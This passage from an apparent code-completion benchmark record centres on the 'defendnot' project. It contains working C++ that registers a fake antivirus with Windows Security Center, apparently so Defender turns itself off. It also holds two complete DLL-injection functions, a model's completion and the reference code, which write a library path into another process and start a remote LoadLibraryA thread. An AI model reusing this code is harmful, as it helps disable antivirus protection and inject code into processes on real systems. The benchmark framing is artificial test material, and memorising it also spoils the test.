com::checked(inst->UpdateSettingsSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_prot_update: {:#x}\", log_prefix, com::checked(inst->UpdateProtectionUpdateSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n            }\n        }\n    } // namespace\n\n    void startup() {\n        /// Setup\n        shared::ctx.deserialize();\n        logln(\"init: {:#x}\", com::checked(CoInitialize(nullptr)));\n\n        /// WSC will reject the register request if name is empty\n        auto name_w = std::wstring(shared::ctx.name.begin(), shared::ctx.name.end());\n        if (name_w.empty()) {\n            throw std::runtime_error(\"AV Name can not be empty!\");\n        }\n\n        /// Convert to BSTR\n        auto name = SysAllocString(name_w.c_str());\n        defer->void {\n            SysFreeString(name);\n        };\n\n        /// Register our stuff in the WSC interfaces\n        apply<IWscASStatus>(\"IWscASStatus\", name);\n        apply<IWscAVStatus4>(\"IWscAVStatus4\", name);\n    }\n} // namespace defendnot\n"]], "task_instance_info": {"created_time": "2025-08-20 19:54:28", "created_task_model": "DeepSeek-R1", "function_skeleton": "[[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {}", "code_description": "This code segment functions to: Create a suspended target process with debugging privileges, allocate memory within the remote process for external library loading, write library path data into the allocated space, and execute a remote thread to load the specified library while managing resource cleanup through deferred handlers."}, "inference_content": {"inference_model": "DeepSeek-R1", "inference_result": "```cpp\n[TASK_BEGIN]\n[[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {\n    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n    if (snapshot == INVALID_HANDLE_VALUE) {\n        throw std::runtime_error(\"Failed to create process snapshot\");\n    }\n    DEFER { CloseHandle(snapshot); };\n\n    PROCESSENTRY32 pe32{};\n    pe32.dwSize = sizeof(pe32);\n    if (!Process32First(snapshot, &pe32)) {\n        throw std::runtime_error(\"Failed to retrieve process information\");\n    }\n\n    DWORD pid = 0;\n    do {\n        if (proc_name == pe32.szExeFile) {\n            pid = pe32.th32ProcessID;\n            break;\n        }\n    } while (Process32Next(snapshot, &pe32));\n\n    if (pid == 0) {\n        throw std::runtime_error(\"Process not found\");\n    }\n\n    HANDLE h_proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n    if (!h_proc) {\n        throw std::runtime_error(\"Failed to open target process\");\n    }\n\n    bool injected = false;\n    DEFER {\n        if (!injected) {\n            CloseHandle(h_proc);\n        }\n    };\n\n    LPVOID remote_mem = VirtualAllocEx(h_proc, nullptr, dll_path.size() + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n    if (!remote_mem) {\n        throw std::runtime_error(\"Failed to allocate memory in target process\");\n    }\n    DEFER {\n        VirtualFreeEx(h_proc, remote_mem, 0, MEM_RELEASE);\n    };\n\n    if (!WriteProcessMemory(h_proc, remote_mem, dll_path.data(), dll_path.size() + 1, nullptr)) {\n        throw std::runtime_error(\"Failed to write DLL path into target process\");\n    }\n\n    FARPROC loadlib_addr = GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"LoadLibraryA\");\n    if (!loadlib_addr) {\n        throw std::runtime_error(\"Failed to get LoadLibraryA address\");\n    }\n\n    HANDLE h_thread = CreateRemoteThread(h_proc, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(loadlib_addr), remote_mem, 0, nullptr);\n    if (!h_thread) {\n        throw std::runtime_error(\"Failed to create remote thread\");\n    }\n    DEFER {\n        CloseHandle(h_thread);\n    };\n\n    WaitForSingleObject(h_thread, INFINITE);\n\n    DWORD exit_code;\n    if (!GetExitCodeThread(h_thread, &exit_code)) {\n        throw std::runtime_error(\"Failed to get thread exit code\");\n    }\n\n    if (exit_code == 0) {\n        throw std::runtime_error(\"Failed to load DLL\");\n    }\n\n    injected = true;\n    return h_proc;\n}\n[TASK_END]\n```", "inference_time": "2025-08-20 19-56-18"}, "editdistance_info": {"edit_distance": 27.9264, "calculate_time": "2025-08-20 19:56:18", "true_code_clean": "[[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {\n        STARTUPINFOA si = {\n            .cb = sizeof(si),\n        };\n        PROCESS_INFORMATION pi = {\n            0,\n        };\n        SECURITY_ATTRIBUTES sa = {\n            .nLength = sizeof(sa),\n            .bInheritHandle = TRUE,\n        };\n        native::get_peb()->read_image_file_exec_options = 0;\n        std::println(\"** booting {}\", proc_name);\n        const auto process_flags = CREATE_SUSPENDED | DEBUG_PROCESS | DEBUG_ONLY_THIS_PROCESS;\n        if (!CreateProcessA(nullptr, const_cast<char*>(proc_name.data()), &sa, &sa, FALSE, process_flags, nullptr, nullptr, &si, &pi)) {\n            throw std::runtime_error(std::format(\"unable to create process: {}\", GetLastError()));\n        }\n        native::debug_set_process_kill_on_exit(false);\n        native::debug_active_process_stop(pi.dwProcessId);\n        defer->void {\n            CloseHandle(pi.hThread);\n        };\n        LPVOID mem = VirtualAllocEx(pi.hProcess, nullptr, dll_path.size() + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n        if (mem == nullptr) {\n            throw std::runtime_error(std::format(\"unable to allocate memory: {}\", GetLastError()));\n        }\n        defer->void {\n            VirtualFreeEx(pi.hProcess, mem, 0, MEM_RELEASE);\n        };\n        if (!WriteProcessMemory(pi.hProcess, mem, dll_path.data(), dll_path.size() + 1, nullptr)) {\n            throw std::runtime_error(std::format(\"unable to write memory: {}\", GetLastError()));\n        }\n        HANDLE thread = CreateRemoteThread(pi.hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(LoadLibraryA), mem, 0, nullptr);\n        if (thread == NULL) {\n            throw std::runtime_error(std::format(\"unable to create thread: {}\", GetLastError()));\n        }\n        defer->void {\n            CloseHandle(thread);\n        };\n        WaitForSingleObject(thread, INFINITE);\n        return pi.hProcess;\n    }", "predict_code_clean": "[[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {\n    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n    if (snapshot == INVALID_HANDLE_VALUE) {\n        throw std::runtime_error(\"Failed to create process snapshot\");\n    }\n    DEFER { CloseHandle(snapshot); };\n    PROCESSENTRY32 pe32{};\n    pe32.dwSize = sizeof(pe32);\n    if (!Process32First(snapshot, &pe32)) {\n        throw std::runtime_error(\"Failed to retrieve process information\");\n    }\n    DWORD pid = 0;\n    do {\n        if (proc_name == pe32.szExeFile) {\n            pid = pe32.th32ProcessID;\n            break;\n        }\n    } while (Process32Next(snapshot, &pe32));\n    if (pid == 0) {\n        throw std::runtime_error(\"Process not found\");\n    }\n    HANDLE h_proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n    if (!h_proc) {\n        throw std::runtime_error(\"Failed to open target process\");\n    }\n    bool injected = false;\n    DEFER {\n        if (!injected) {\n            CloseHandle(h_proc);\n        }\n    };\n    LPVOID remote_mem = VirtualAllocEx(h_proc, nullptr, dll_path.size() + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n    if (!remote_mem) {\n        throw std::runtime_error(\"Failed to allocate memory in target process\");\n    }\n    DEFER {\n        VirtualFreeEx(h_proc, remote_mem, 0, MEM_RELEASE);\n    };\n    if (!WriteProcessMemory(h_proc, remote_mem, dll_path.data(), dll_path.size() + 1, nullptr)) {\n        throw std::runtime_error(\"Failed to write DLL path into target process\");\n    }\n    FARPROC loadlib_addr = GetProcAddress(GetModuleHandleA(\"kernel32.dll\"), \"LoadLibraryA\");\n    if (!loadlib_addr) {\n        throw std::runtime_error(\"Failed to get LoadLibraryA address\");\n    }\n    HANDLE h_thread = CreateRemoteThread(h_proc, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(loadlib_addr), remote_mem, 0, nullptr);\n    if (!h_thread) {\n        throw std::runtime_error(\"Failed to create remote thread\");\n    }\n    DEFER {\n        CloseHandle(h_thread);\n    };\n    WaitForSingleObject(h_thread, INFINITE);\n    DWORD exit_code;\n    if (!GetExitCodeThread(h_thread, &exit_code)) {\n        throw std::runtime_error(\"Failed to get thread exit code\");\n    }\n    if (exit_code == 0) {\n        throw std::runtime_error(\"Failed to load DLL\");\n    }\n    injected = true;\n    return h_proc;\n}"}}